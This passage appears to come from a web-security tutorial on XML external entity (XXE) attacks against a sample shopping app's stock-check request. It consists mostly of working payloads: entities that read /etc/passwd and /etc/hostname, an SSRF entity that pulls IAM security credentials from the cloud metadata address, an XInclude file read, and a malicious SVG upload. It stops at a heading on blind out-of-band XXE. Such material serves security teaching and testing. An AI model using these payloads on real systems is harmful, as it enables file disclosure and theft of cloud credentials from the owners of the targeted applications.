For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

Exploiting XXE using external entities to retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Exploiting XXE to perform SSRF attacks

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "<http://169.254.169.254//latest/meta-data/iam/security-credentials/admin>"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Exploiting XInclude to retrieve files

productId=<foo xmlns:xi="[<http://www.w3.org/2001/XInclude>](<http://www.w3.org/2001/XInclude>)">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Exploiting XXE via image file upload

Create a local SVG image with the following content

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="<http://www.w3.org/2000/svg>" xmlns:xlink="<http://www.w3.org/1999/xlink>" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Access the image to view the content of the file

Blind XXE with out-of-band interaction